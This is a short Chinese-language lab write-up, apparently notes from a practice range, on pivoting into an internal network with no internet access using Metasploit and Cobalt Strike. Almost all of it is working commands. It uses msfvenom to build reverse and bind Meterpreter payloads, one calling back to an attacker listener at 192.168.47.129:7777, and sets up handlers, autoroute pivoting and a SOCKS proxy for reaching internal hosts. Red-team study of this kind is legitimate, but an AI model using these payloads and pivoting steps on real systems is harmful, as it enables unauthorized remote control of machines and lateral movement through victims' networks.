路由不出网-CS-MSF控制上线
靶场搭建
MSF上线
先上线有外网的:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.47.129 LPORT=7777 -f exe > msf001.exe
然后:
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 7777
run
添加路由
先查看路由信息
run autoroute -p
提示使用这个参数添加:
run post/multi/manage/autoroute
或者添加指定路由:
route add 192.168.11.0 255.255.255.0 1
Sock 代理
use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 36557
run
使用Proxifier连接:
可以看到内网的服务:
MSF正向上线
因为有了路由信息,可以直接访问内网其他主机,所以去找其他机器让他正向上线
msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333 -f exe > bd.exe
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.3.32
set lport 3333
run
CS 上线
同上一篇,这里将Socks代理和不出网上线,
CS通讯:
或者命令:socks {端口}
正向链接
- 监听器:bind_tcp prot
- 命令:connect [ip] prot
后续操作一致。
